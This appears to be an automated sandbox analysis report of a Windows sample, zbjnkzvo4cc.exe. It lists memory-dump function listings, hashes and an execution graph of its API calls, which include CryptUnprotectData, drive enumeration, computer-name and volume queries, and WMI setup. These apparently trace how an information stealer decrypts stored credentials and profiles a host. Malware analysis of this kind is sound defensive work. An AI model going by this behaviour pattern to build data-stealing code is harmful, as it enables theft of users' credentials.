                                                                                                                                                            • Associated: 00000018.00000002.2248471350.0000000068BF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2248715259.0000000068C0B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1096550386-0
                                                                                                                                                            • Opcode ID: 85dd169ec2b081e29028fc47e67e73a29f93c85af7c8d4015008e8e4510575c8
                                                                                                                                                            • Instruction ID: eb01489a2910a5dbdff08b50f14dd65d51d78863fadcca67b8c423d9532d3854
                                                                                                                                                            • Opcode Fuzzy Hash: 85dd169ec2b081e29028fc47e67e73a29f93c85af7c8d4015008e8e4510575c8
                                                                                                                                                            • Instruction Fuzzy Hash: 1D51B372500216AFEF198E9CCC40EFB3AB9EB457D4F914529F924AB140F733DD11AA60
                                                                                                                                                            APIs
                                                                                                                                                            • _free.LIBCMT ref: 68C0899D
                                                                                                                                                              • Part of subcall function 68C04273: HeapFree.KERNEL32(00000000,00000000,?,68C034AC), ref: 68C04289
                                                                                                                                                              • Part of subcall function 68C04273: GetLastError.KERNEL32(?,?,68C034AC), ref: 68C0429B
                                                                                                                                                            • _free.LIBCMT ref: 68C089AF
                                                                                                                                                            • _free.LIBCMT ref: 68C089C1
                                                                                                                                                            • _free.LIBCMT ref: 68C089D3
                                                                                                                                                            • _free.LIBCMT ref: 68C089E5
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000018.00000002.2248504311.0000000068BF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 68BF0000, based on PE: true
                                                                                                                                                            • Associated: 00000018.00000002.2248471350.0000000068BF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2248715259.0000000068C0B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                            • Opcode ID: cb0e0bfe1baf80e3d322acdf7dc16c9b2979c70af2bc934185c1426239bf51ce
                                                                                                                                                            • Instruction ID: 9c1a7af18f684459deb926159b5366e78beb55f303cb233a48e4f5a49063f550
                                                                                                                                                            • Opcode Fuzzy Hash: cb0e0bfe1baf80e3d322acdf7dc16c9b2979c70af2bc934185c1426239bf51ce
                                                                                                                                                            • Instruction Fuzzy Hash: 54F0FF319446045BCE20EEADE885C3B77E9EB057A47904815F475F7500E732F9C19AE9
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 68C04999: _free.LIBCMT ref: 68C049A7
                                                                                                                                                              • Part of subcall function 68C0556D: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,68C075E3,?,00000000,00000000), ref: 68C05619
                                                                                                                                                            • GetLastError.KERNEL32 ref: 68C043DF
                                                                                                                                                            • __dosmaperr.LIBCMT ref: 68C043E6
                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 68C04425
                                                                                                                                                            • __dosmaperr.LIBCMT ref: 68C0442C
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000018.00000002.2248504311.0000000068BF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 68BF0000, based on PE: true
                                                                                                                                                            • Associated: 00000018.00000002.2248471350.0000000068BF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2248715259.0000000068C0B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 167067550-0
                                                                                                                                                            • Opcode ID: 155573919d901a6909036a6401ef5d9f2d1df46403bedaaa9ed19295698ecd25
                                                                                                                                                            • Instruction ID: 558f0b0afcb30057c775e7483bfa6c7e3436a43910b4e77a8295008b65069509
                                                                                                                                                            • Opcode Fuzzy Hash: 155573919d901a6909036a6401ef5d9f2d1df46403bedaaa9ed19295698ecd25
                                                                                                                                                            • Instruction Fuzzy Hash: A821B671604615AF9B309FAE8C8492B77ADFF613EC7808528F974A7640F732EC418B90
                                                                                                                                                            APIs
                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,68C07F87,?,00000001,68C06394,?,68C08441,00000001,?,?,?,68C06323,?,00000000), ref: 68C03C7C
                                                                                                                                                            • _free.LIBCMT ref: 68C03CD9
                                                                                                                                                            • _free.LIBCMT ref: 68C03D0F
                                                                                                                                                            • SetLastError.KERNEL32(00000000,00000013,000000FF,?,68C08441,00000001,?,?,?,68C06323,?,00000000,00000000,68C10360,0000002C,68C06394), ref: 68C03D1A
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000018.00000002.2248504311.0000000068BF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 68BF0000, based on PE: true
                                                                                                                                                            • Associated: 00000018.00000002.2248471350.0000000068BF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2248715259.0000000068C0B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorLast_free
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2283115069-0
                                                                                                                                                            • Opcode ID: 29de32d98fedf0e4fcd568137d5d5354038b4dae837c23037453d0f7b3277ecd
                                                                                                                                                            • Instruction ID: 0fd1bb96fc0004aa95d3df4f99c668974be53d79a2acd90a60e72513a4d64921
                                                                                                                                                            • Opcode Fuzzy Hash: 29de32d98fedf0e4fcd568137d5d5354038b4dae837c23037453d0f7b3277ecd
                                                                                                                                                            • Instruction Fuzzy Hash: BE11E7392146016FDE0256BD4C88E3F2669AB827FDBE10224F230E31C1FFA3C9118111
                                                                                                                                                            APIs
                                                                                                                                                            • GetLastError.KERNEL32(?,?,00000001,68C04208,68C04299,?,?,68C034AC), ref: 68C03DD3
                                                                                                                                                            • _free.LIBCMT ref: 68C03E30
                                                                                                                                                            • _free.LIBCMT ref: 68C03E66
                                                                                                                                                            • SetLastError.KERNEL32(00000000,00000013,000000FF,?,00000001,68C04208,68C04299,?,?,68C034AC), ref: 68C03E71
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000018.00000002.2248504311.0000000068BF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 68BF0000, based on PE: true
                                                                                                                                                            • Associated: 00000018.00000002.2248471350.0000000068BF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2248715259.0000000068C0B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorLast_free
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2283115069-0
                                                                                                                                                            • Opcode ID: 81d349b66a01ae83df18ac4b127eec3caf5fe0ffc5eecf207171383353caaf48
                                                                                                                                                            • Instruction ID: 56287a5c53b4a22e03645e779636c67c301ce35bee6014d48502afa9772b906a
                                                                                                                                                            • Opcode Fuzzy Hash: 81d349b66a01ae83df18ac4b127eec3caf5fe0ffc5eecf207171383353caaf48
                                                                                                                                                            • Instruction Fuzzy Hash: 341186362282516FDA0259BD5CC8E3F266AABC27F9FE10224F634A71D1FFA3CD114111
                                                                                                                                                            APIs
                                                                                                                                                            • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,68C08C30,?,00000001,?,00000001,?,68C07F16,?,?,00000001), ref: 68C091ED
                                                                                                                                                            • GetLastError.KERNEL32(?,68C08C30,?,00000001,?,00000001,?,68C07F16,?,?,00000001,?,00000001,?,68C08462,68C06323), ref: 68C091F9
                                                                                                                                                              • Part of subcall function 68C091BF: CloseHandle.KERNEL32(FFFFFFFE,68C09209,?,68C08C30,?,00000001,?,00000001,?,68C07F16,?,?,00000001,?,00000001), ref: 68C091CF
                                                                                                                                                            • ___initconout.LIBCMT ref: 68C09209
                                                                                                                                                              • Part of subcall function 68C09181: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,68C091B0,68C08C1D,00000001,?,68C07F16,?,?,00000001,?), ref: 68C09194
                                                                                                                                                            • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,68C08C30,?,00000001,?,00000001,?,68C07F16,?,?,00000001,?), ref: 68C0921E
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000018.00000002.2248504311.0000000068BF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 68BF0000, based on PE: true
                                                                                                                                                            • Associated: 00000018.00000002.2248471350.0000000068BF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2248715259.0000000068C0B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2744216297-0
                                                                                                                                                            • Opcode ID: 0a22f51aa35f36b70fcf6da662de61818caa1c38153a513e1254aa41670a86b5
                                                                                                                                                            • Instruction ID: 81b4338c3df50c27a3e39e79df7b7e76b11c721558974a8de59e53fd49675fc4
                                                                                                                                                            • Opcode Fuzzy Hash: 0a22f51aa35f36b70fcf6da662de61818caa1c38153a513e1254aa41670a86b5
                                                                                                                                                            • Instruction Fuzzy Hash: 56F0AC36500115BBCF125F96DC08A9E7F76EB4A3E5F554014FB28A5220D633C961DB91
                                                                                                                                                            APIs
                                                                                                                                                            • _free.LIBCMT ref: 68C035AD
                                                                                                                                                              • Part of subcall function 68C04273: HeapFree.KERNEL32(00000000,00000000,?,68C034AC), ref: 68C04289
                                                                                                                                                              • Part of subcall function 68C04273: GetLastError.KERNEL32(?,?,68C034AC), ref: 68C0429B
                                                                                                                                                            • _free.LIBCMT ref: 68C035C0
                                                                                                                                                            • _free.LIBCMT ref: 68C035D1
                                                                                                                                                            • _free.LIBCMT ref: 68C035E2
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000018.00000002.2248504311.0000000068BF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 68BF0000, based on PE: true
                                                                                                                                                            • Associated: 00000018.00000002.2248471350.0000000068BF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2248715259.0000000068C0B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                            • Opcode ID: 24c684a475c44aaa017d36b1641be24fc1fd7a61da4506f112353c850a9b3a8a
                                                                                                                                                            • Instruction ID: e80663a099993e2644f47fc8c6cbe4ec4adace9c110f65e81b60e8833224ff52
                                                                                                                                                            • Opcode Fuzzy Hash: 24c684a475c44aaa017d36b1641be24fc1fd7a61da4506f112353c850a9b3a8a
                                                                                                                                                            • Instruction Fuzzy Hash: 8AE04F78810160DA8F219F2FE84043EBE31BB1B6483400527E80432214D73696D2EFC9
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000018.00000002.2248504311.0000000068BF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 68BF0000, based on PE: true
                                                                                                                                                            • Associated: 00000018.00000002.2248471350.0000000068BF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2248715259.0000000068C0B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: C:\Windows\Temp\zbjnkzvo4cc.exe
                                                                                                                                                            • API String ID: 0-1163479202
                                                                                                                                                            • Opcode ID: 539cc638a22e2da28b3a6a0ac47b7ed2b8e9c8a32901d02853ae62d0091e99df
                                                                                                                                                            • Instruction ID: cfacb0916c46e26093cd116cc7d68a5a6ba4383c7bc6d74488e4c69aaee07bcb
                                                                                                                                                            • Opcode Fuzzy Hash: 539cc638a22e2da28b3a6a0ac47b7ed2b8e9c8a32901d02853ae62d0091e99df
                                                                                                                                                            • Instruction Fuzzy Hash: A5417575A04224ABDB12CF9DC8909AEBBF9EF9D3D4F900066E514E7344F7729A41CB50
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmp, Offset: 68C11000, based on PE: true
                                                                                                                                                            • Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 4$^tpr$b$r}
                                                                                                                                                            • API String ID: 0-605887794
                                                                                                                                                            • Opcode ID: f8d187cc6615d5e3622de574f329ab65def0a2f663cee4735a8cee40715f13af
                                                                                                                                                            • Instruction ID: 559a52c884beb4cd1e11d9dcf4956d894782d7ccd4873d8efb6552448bd7070c
                                                                                                                                                            • Opcode Fuzzy Hash: f8d187cc6615d5e3622de574f329ab65def0a2f663cee4735a8cee40715f13af
                                                                                                                                                            • Instruction Fuzzy Hash: 1981D43110C3D58AD711CF29849436BBFE1AF92344F5889AEE4E59B282D73AC50FD762
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmp, Offset: 68C11000, based on PE: true
                                                                                                                                                            • Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: a9$ph$uq$ge
                                                                                                                                                            • API String ID: 0-4278815132
                                                                                                                                                            • Opcode ID: 02463ad8e39931774826c245cce29b01549f7e90fdaa6f8ebd3edf1248d1b480
                                                                                                                                                            • Instruction ID: 8a6d90fa9221d770a85577ae20d116af413465e70b51207ec916fdb47972ba46
                                                                                                                                                            • Opcode Fuzzy Hash: 02463ad8e39931774826c245cce29b01549f7e90fdaa6f8ebd3edf1248d1b480
                                                                                                                                                            • Instruction Fuzzy Hash: A65199B8045B858FD364CF229591B8BBBF1FB25704F108A1CD1EB1B664CB706045CF96

                                                                                                                                                            Execution Graph

                                                                                                                                                            Execution Coverage:10.7%
                                                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                            Signature Coverage:25.2%
                                                                                                                                                            Total number of Nodes:298
                                                                                                                                                            Total number of Limit Nodes:30
                                                                                                                                                            execution_graph 11668 25ce29c 11669 25ce2b5 11668->11669 11669->11669 11672 25da760 11669->11672 11674 25da76e 11672->11674 11676 25da857 11674->11676 11681 25dfac0 LdrInitializeThunk 11674->11681 11675 25da95b 11678 25cfd4a 11675->11678 11682 25dfac0 LdrInitializeThunk 11675->11682 11676->11675 11676->11678 11680 25dfac0 LdrInitializeThunk 11676->11680 11680->11676 11681->11674 11682->11675 11683 25ba4da 11684 25ba4e0 11683->11684 11684->11684 11702 25e2370 11684->11702 11686 25ba90a 11688 25ba695 11688->11686 11691 25ba6d6 11688->11691 11694 25ba7de 11688->11694 11727 25e27d0 11688->11727 11689 25ba62d 11689->11686 11689->11688 11689->11691 11689->11694 11698 25ba7e0 11689->11698 11723 25e26f0 11689->11723 11691->11686 11691->11694 11733 25dfac0 LdrInitializeThunk 11691->11733 11693 25baac3 CryptUnprotectData 11693->11698 11694->11686 11694->11693 11694->11698 11695 25bb027 11700 25bb0fd 11695->11700 11706 25db350 11695->11706 11698->11695 11698->11698 11698->11700 11734 25bebf0 11698->11734 11700->11700 11701 25bb3e1 11701->11700 11715 25dd260 11701->11715 11703 25e2390 11702->11703 11703->11703 11704 25e24de 11703->11704 11737 25dfac0 LdrInitializeThunk 11703->11737 11704->11689 11738 25e2b00 11706->11738 11710 25db396 11713 25db3d3 11710->11713 11750 25e3580 11710->11750 11711 25db45e 11711->11701 11713->11711 11758 25dfac0 LdrInitializeThunk 11713->11758 11716 25dd290 11715->11716 11719 25dd2ee 11716->11719 11768 25dfac0 LdrInitializeThunk 11716->11768 11717 25dd4d1 11717->11701 11719->11717 11720 25dd3de 11719->11720 11769 25dfac0 LdrInitializeThunk 11719->11769 11721 25dd1b0 RtlFreeHeap 11720->11721 11721->11717 11725 25e2720 11723->11725 11724 25e277e 11724->11688 11725->11724 11770 25dfac0 LdrInitializeThunk 11725->11770 11728 25e2800 11727->11728 11731 25e285e 11728->11731 11771 25dfac0 LdrInitializeThunk 11728->11771 11730 25e291e 11730->11691 11731->11730 11772 25dfac0 LdrInitializeThunk 11731->11772 11733->11694 11735 25bec15 11734->11735 11736 25b90d0 RtlFreeHeap LdrInitializeThunk 11735->11736 11736->11735 11737->11704 11740 25e2b20 11738->11740 11739 25db36c 11739->11711 11742 25e2f40 11739->11742 11740->11739 11759 25dfac0 LdrInitializeThunk 11740->11759 11744 25e2f70 11742->11744 11743 25e3244 11743->11710 11747 25e2fce 11744->11747 11760 25dfac0 LdrInitializeThunk 11744->11760 11747->11743 11749 25e309e 11747->11749 11761 25dfac0 LdrInitializeThunk 11747->11761 11749->11749 11762 25dd1b0 11749->11762 11751 25e358f 11750->11751 11753 25e366e 11751->11753 11766 25dfac0 LdrInitializeThunk 11751->11766 11754 25e37ae 11753->11754 11756 25e3861 11753->11756 11767 25dfac0 LdrInitializeThunk 11753->11767 11755 25dd1b0 RtlFreeHeap 11754->11755 11755->11756 11756->11713 11758->11711 11759->11739 11760->11747 11761->11749 11763 25dd1c4 11762->11763 11764 25dd24a RtlFreeHeap 11762->11764 11765 25dd256 11762->11765 11763->11764 11764->11765 11765->11743 11766->11753 11767->11754 11768->11719 11769->11720 11770->11724 11771->11731 11772->11730 11778 25c6618 11779 25c6620 11778->11779 11787 25e2530 11779->11787 11781 25c6a72 11781->11781 11783 25c6901 GetLogicalDrives 11785 25e2530 LdrInitializeThunk 11783->11785 11784 25c6791 11784->11781 11784->11783 11784->11784 11786 25c6917 11784->11786 11785->11786 11786->11781 11791 25c4860 11786->11791 11788 25e2550 11787->11788 11789 25e269e 11788->11789 11803 25dfac0 LdrInitializeThunk 11788->11803 11789->11784 11792 25e2370 LdrInitializeThunk 11791->11792 11796 25c48a3 11792->11796 11793 25c50cd 11793->11781 11794 25c5045 11797 25dd1b0 RtlFreeHeap 11794->11797 11796->11793 11801 25c495e 11796->11801 11804 25dfac0 LdrInitializeThunk 11796->11804 11798 25c5055 11797->11798 11798->11793 11806 25dfac0 LdrInitializeThunk 11798->11806 11801->11794 11802 25dd1b0 RtlFreeHeap 11801->11802 11805 25dfac0 LdrInitializeThunk 11801->11805 11802->11801 11803->11789 11804->11796 11805->11801 11806->11798 11807 25aad50 11809 25aad90 11807->11809 11808 25ab094 11809->11808 11809->11809 11810 25dd1b0 RtlFreeHeap 11809->11810 11810->11808 11878 25a8c70 11879 25a8c7f 11878->11879 11880 25a8e47 ExitProcess 11879->11880 11881 25a8c87 SHGetSpecialFolderPathW 11879->11881 11882 25a8c9d 11881->11882 11883 25a8ca5 GetCurrentThreadId 11882->11883 11884 25a8e3d 11882->11884 11885 25a8cc5 GetCurrentProcessId GetForegroundWindow 11883->11885 11884->11880 11887 25a8da4 11885->11887 11891 25aa020 11887->11891 11889 25a8e31 11889->11884 11890 25ad2b0 CoInitializeEx 11889->11890 11890->11884 11892 25aa050 LoadLibraryExW 11891->11892 11894 25aa0fc 11892->11894 11895 25ad6f0 11896 25ad710 11895->11896 11897 25ad795 11896->11897 11899 25dfac0 LdrInitializeThunk 11896->11899 11899->11897 11811 25b90d0 11812 25b90f0 11811->11812 11813 25e2370 LdrInitializeThunk 11812->11813 11815 25b91be 11813->11815 11814 25b929b 11817 25b92fb 11814->11817 11820 25e26f0 LdrInitializeThunk 11814->11820 11822 25b930c 11814->11822 11824 25b9346 11814->11824 11826 25b92a7 11814->11826 11815->11814 11816 25b928e 11815->11816 11815->11817 11815->11822 11815->11824 11815->11826 11827 25db0a0 11815->11827 11816->11814 11816->11817 11819 25e2370 LdrInitializeThunk 11816->11819 11816->11822 11816->11824 11816->11826 11821 25e26f0 LdrInitializeThunk 11817->11821 11819->11814 11820->11817 11821->11822 11823 25e27d0 LdrInitializeThunk 11822->11823 11822->11824 11822->11826 11823->11824 11824->11826 11841 25dfac0 LdrInitializeThunk 11824->11841 11826->11826 11828 25e2370 LdrInitializeThunk 11827->11828 11835 25db0be 11828->11835 11829 25db18f 11833 25dd1b0 RtlFreeHeap 11829->11833 11830 25db607 11837 25db195 11833->11837 11834 25dd500 LdrInitializeThunk 11840 25db16e 11834->11840 11835->11829 11836 25db0cd 11835->11836 11835->11840 11843 25dfac0 LdrInitializeThunk 11835->11843 11836->11816 11837->11836 11842 25dfac0 LdrInitializeThunk 11837->11842 11840->11829 11840->11830 11840->11834 11844 25dd650 11840->11844 11848 25dd710 11840->11848 11841->11826 11842->11836 11843->11840 11845 25dd6de 11844->11845 11846 25dd65a 11844->11846 11845->11840 11846->11845 11856 25dfac0 LdrInitializeThunk 11846->11856 11849 25dd7b0 11848->11849 11850 25dd72a 11848->11850 11849->11840 11850->11849 11853 25dd7ae 11850->11853 11857 25dfac0 LdrInitializeThunk 11850->11857 11852 25dd8ee 11852->11849 11852->11852 11859 25dfac0 LdrInitializeThunk 11852->11859 11853->11852 11858 25dfac0 LdrInitializeThunk 11853->11858 11856->11845 11857->11853 11858->11852 11859->11849 11900 25ad7f1 11901 25ad800 11900->11901 11903 25ad88e 11901->11903 11976 25dfac0 LdrInitializeThunk 11901->11976 11905 25ad95e 11903->11905 11977 25dfac0 LdrInitializeThunk 11903->11977 11916 25c6bd0 11905->11916 11907 25ad9cf 11936 25c6e00 11907->11936 11909 25ad9ef 11958 25c9060 11909->11958 11923 25c6c70 11916->11923 11917 25c6d67 11985 25c2110 11917->11985 11918 25e2f40 2 API calls 11918->11923 11919 25c6b7d 11919->11907 11921 25c6f80 11992 25e2c40 11921->11992 11923->11917 11923->11918 11923->11919 11923->11921 11925 25e2b00 LdrInitializeThunk 11930 25c6fe4 11925->11930 11926 25c7d67 11931 25c8140 11926->11931 12000 25e3260 11926->12000 11927 25e2b00 LdrInitializeThunk 11927->11930 11929 25c7bb0 11929->11919 12010 25dfac0 LdrInitializeThunk 11929->12010 11930->11926 11930->11927 11930->11929 11930->11930 11930->11931 11934 25c8234 11931->11934 12008 25dfac0 LdrInitializeThunk 11931->12008 12009 25dfac0 LdrInitializeThunk 11934->12009 11937 25c6e10 11936->11937 11938 25e2b00 LdrInitializeThunk 11937->11938 11942 25c6d30 11938->11942 11939 25e2f40 2 API calls 11939->11942 11940 25c6d67 11945 25c2110 2 API calls 11940->11945 11941 25c6b7d 11941->11909 11942->11939 11942->11940 11942->11941 11943 25c6f80 11942->11943 11944 25e2c40 2 API calls 11943->11944 11946 25c6fb0 11944->11946 11945->11941 11947 25e2b00 LdrInitializeThunk 11946->11947 11950 25c6fe4 11946->11950 11947->11950 11948 25c7bb0 11948->11941 12017 25dfac0 LdrInitializeThunk 11948->12017 11949 25e2b00 LdrInitializeThunk 11949->11950 11950->11948 11950->11949 11952 25c7d67 11950->11952 11953 25c8140 11950->11953 11951 25e3260 2 API calls 11951->11952 11952->11951 11952->11952 11952->11953 11956 25c8234 11953->11956 12015 25dfac0 LdrInitializeThunk 11953->12015 12016 25dfac0 LdrInitializeThunk 11956->12016 11959 25c9090 11958->11959 11962 25c90ee 11959->11962 12018 25dfac0 LdrInitializeThunk 11959->12018 11960 25ada18 11966 25c9520 11960->11966 11962->11960 11965 25c91ee 11962->11965 12019 25dfac0 LdrInitializeThunk 11962->12019 11963 25dd1b0 RtlFreeHeap 11963->11960 11965->11963 12020 25c9540 11966->12020 11976->11903 11977->11905 11986 25c2120 11985->11986 11986->11986 11987 25c222c 11986->11987 11988 25c21f1 11986->11988 11990 25c2267 11986->11990 11987->11919 11989 25e2530 LdrInitializeThunk 11988->11989 11989->11987 11990->11987 11991 25c4860 2 API calls 11990->11991 11991->11990 11993 25e2c70 11992->11993 11996 25e2cce 11993->11996 12011 25dfac0 LdrInitializeThunk 11993->12011 11994 25c6fb0 11994->11925 11994->11930 11996->11994 11999 25e2df3 11996->11999 12012 25dfac0 LdrInitializeThunk 11996->12012 11997 25dd1b0 RtlFreeHeap 11997->11994 11999->11997 12002 25e3290 12000->12002 12001 25e3568 12001->11926 12004 25e32ee 12002->12004 12013 25dfac0 LdrInitializeThunk 12002->12013 12004->12001 12007 25e33be 12004->12007 12014 25dfac0 LdrInitializeThunk 12004->12014 12006 25dd1b0 RtlFreeHeap 12006->12001 12007->12006 12008->11931 12009->11929 12010->11919 12011->11996 12012->11999 12013->12004 12014->12007 12015->11953 12016->11948 12017->11941 12018->11962 12019->11965 12021 25c95b0 12020->12021 12021->12021 12022 25dd260 2 API calls 12021->12022 12023 25c95e4 12022->12023 12024 25dfa30 12025 25dfa4a 12024->12025 12027 25dfa58 12024->12027 12026 25dd1b0 RtlFreeHeap 12025->12026 12025->12027 12026->12027 12028 25cf3ed 12034 25e1930 12028->12034 12031 25cf450 GetComputerNameExA 12033 25cf560 12031->12033 12035 25cf3fd GetComputerNameExA 12034->12035 12035->12031 11860 25ada8d 11861 25ada93 11860->11861 11862 25adaa2 CoUninitialize 11861->11862 11863 25adae0 11862->11863 12041 25ad2e3 CoInitializeSecurity 12042 25ad320 12043 25ad340 12042->12043 12046 25daae0 12043->12046 12045 25ad378 12045->12045 12047 25dab40 CoCreateInstance 12046->12047 12049 25dabea SysAllocString 12047->12049 12050 25dafb5 12047->12050 12053 25dac77 12049->12053 12051 25dafc5 GetVolumeInformationW 12050->12051 12061 25dafdc 12051->12061 12054 25dac7f CoSetProxyBlanket 12053->12054 12055 25dafa1 SysFreeString 12053->12055 12056 25dac9f 